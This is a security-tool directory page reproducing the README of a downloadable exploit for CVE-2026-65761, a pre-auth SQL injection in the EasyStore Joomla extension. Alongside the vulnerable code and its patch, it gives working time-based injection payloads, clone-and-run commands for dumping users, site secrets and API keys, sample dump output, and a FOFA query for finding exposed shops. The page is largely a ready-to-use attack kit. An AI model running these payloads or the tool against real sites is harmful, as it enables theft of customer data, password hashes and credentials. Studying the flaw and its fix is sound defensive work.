Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-65761 — EasyStore Joomla Pre-Auth SQL Injection via filter_sortby Direction (CVE-2026-65761, CVSS 9.3) | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-65761
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubshinthink/cve-2026-65761

CVE-2026-65761

EasyStore Joomla Pre-Auth SQL Injection via filter_sortby Direction (CVE-2026-65761, CVSS 9.3)

View Repository
1 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-65761 — EasyStore Joomla Pre-Auth SQL Injection

filter_sortby Direction → ORDER BY Injection → Full DB Read


Overview

CVE-2026-65761 (CVSS 9.3 Critical) is an unauthenticated SQL injection in EasyStore for Joomla by JoomShaper, affecting versions ≤ 2.0.1.

The filter_sortby product listing parameter is split into a column and direction. While the column is validated against an allow-list, the without any ASC/DESC restriction — allowing arbitrary SQL injection by an anonymous visitor.

direction is concatenated directly into the SQL ORDER BY clause

An unauthenticated attacker can read the entire Joomla database: user accounts, password hashes, session data, site secrets, API keys, and all customer PII (names, emails, addresses, phone numbers, purchase history).

CVECVE-2026-65761
CVSS9.3 Critical
AffectedEasyStore ≤ 2.0.1
FixedEasyStore 2.0.2
TypeSQL Injection (CWE-89)
AuthenticationNone required
DiscoveredPhil Taylor (mySites.guru) — July 2026

Vulnerability Mechanism

Root Cause

FilterHelper.php:741 returns the sort direction without any ASC/DESC allow-list check:

root@kitploit:~
// Vulnerable (EasyStore 2.0.1)
// FilterHelper.php:741
return [$orderArray[0], strtoupper($orderArray[1])];
//                      ^^^^^^^^^ No validation — raw value after uppercase

ProductsModel.php:932 concatenates the direction directly into SQL:

root@kitploit:~
// ProductsModel.php:932
$query->order($column . ' ' . $direction);
//                        ^^^^^^^^^ Raw SQL concatenation

The sibling brand and collection listings had proper direction allow-lists. The product listing did not.

Patch (EasyStore 2.0.2)

root@kitploit:~
// Fixed — FilterHelper.php:741-742
$direction = strtoupper($orderArray[1]);
return [$orderArray[0], in_array($direction, ['ASC', 'DESC']) ? $direction : 'ASC'];
//                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Allow-list check

// Fixed — ProductsModel.php:918-920 (second validation added)
if (!in_array(strtoupper($direction), ['ASC', 'DESC'])) {
    $direction = 'DESC';
}

Attack Flow

root@kitploit:~
1. Attacker crafts: filter_sortby=price-ASC,(SELECT SLEEP(5))
   └─ splits to: column=price, direction=ASC,(SELECT SLEEP(5))

2. Column "price" passes allow-list check ✅
   └─ ['ordering','featured','best_selling','title','price','created']

3. Direction "ASC,(SELECT SLEEP(5))" passes strtoupper()
   └─ No ASC/DESC validation in vulnerable version

4. SQL constructed:
   ORDER BY min_price ASC,(SELECT SLEEP(5))
   └─ Time-based confirmation: 5 second delay

5. Attacker extracts full database via blind SQLi

Prerequisites

RequirementDetails
EasyStore ≤ 2.0.1Vulnerable version installed
Product listing accessibleindex.php?option=com_easystore&view=products
No authenticationWorks anonymously
MySQL/MariaDBTime-based extraction via SLEEP()

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-65761.git
cd CVE-2026-65761
# No dependencies required — Python stdlib only

Usage

root@kitploit:~
# Check vulnerability (non-destructive)
python3 cve_2026_65761.py --url https://target.com --check

# Dump Joomla users (usernames, emails, names)
python3 cve_2026_65761.py --url https://target.com --dump-users

# Full dump (users + site secret + EasyStore config + API keys)
python3 cve_2026_65761.py --url https://target.com --dump-joomla

Output

root@kitploit:~
+=================================================================+
|  CVE-2026-65761 — EasyStore Joomla Pre-Auth SQLi Exploit        |
+=================================================================+
  Target :  https://shop.target.com
  Plugin :  EasyStore ≤ 2.0.1 | Payload: filter_sortby=col-ASC,INJECTION

[STEP 1] Verifying SQL injection (time-based)
  [*] SLEEP(5) delay: 5.2s
  [+] SQLi confirmed (5.2s)

[STEP 2] Database fingerprint
    [Version] 10.11.14-MariaDB
    [Database] joomla_db
    [User]    joomla_user@localhost
    [Prefix]  jos_
  [+] Version : 10.11.14-MariaDB
  [+] Database: joomla_db
  [+] User    : joomla_user@localhost
  [+] Prefix  : jos_

[STEP 3] Dumping users
  [+] Users: 15

  USERNAME                  EMAIL                               NAME
  ─────────────────────     ───────────────────────────────     ──────────
  admin                     [email protected]                      Super User
  manager                   [email protected]                    Store Manager

[STEP 4] Dumping sensitive configuration
    [Secret] abc123def456...
    [EasyStore] {"paypal_email":"[email protected]"...
  [+] Secret: abc123def456...
  [+] EasyStore: {"paypal_email":"[email protected]"...
  [+]   paypal_email: [email protected]

Requests: 1847

Technical Details

Vulnerable Code Path

FileLineIssue
site/src/Helper/FilterHelper.php741Returns direction without allow-list — strtoupper() only
site/src/Model/ProductsModel.php932Concatenates $direction directly into ORDER BY clause

Injection Parameter

root@kitploit:~
filter_sortby = <column>-<direction>

Valid columns (allow-list passes):
  ordering, featured, best_selling, title, price, created

Direction (no validation):
  Injected directly after strtoupper()
  → ASC,(SELECT SLEEP(5))
  → ASC,(SELECT IF((condition),SLEEP(2),0))

Additional Vulnerabilities in EasyStore 2.0.1

CVETypeCVSS
CVE-2026-65759Order forgery / payment manipulation8.7
CVE-2026-65760Invoice IDOR (cross-customer data exposure)9.2
CVE-2026-65761SQL Injection (this exploit)9.3

FOFA Dork

root@kitploit:~
body="com_easystore" && body="filter_sortby"

References

  • mySites.guru — Original Disclosure
  • JoomShaper — EasyStore Free
  • VulDB — CVE-2026-65761

Disclaimer

For authorized security testing and educational research only. The authors assume no liability for misuse.

Download Tool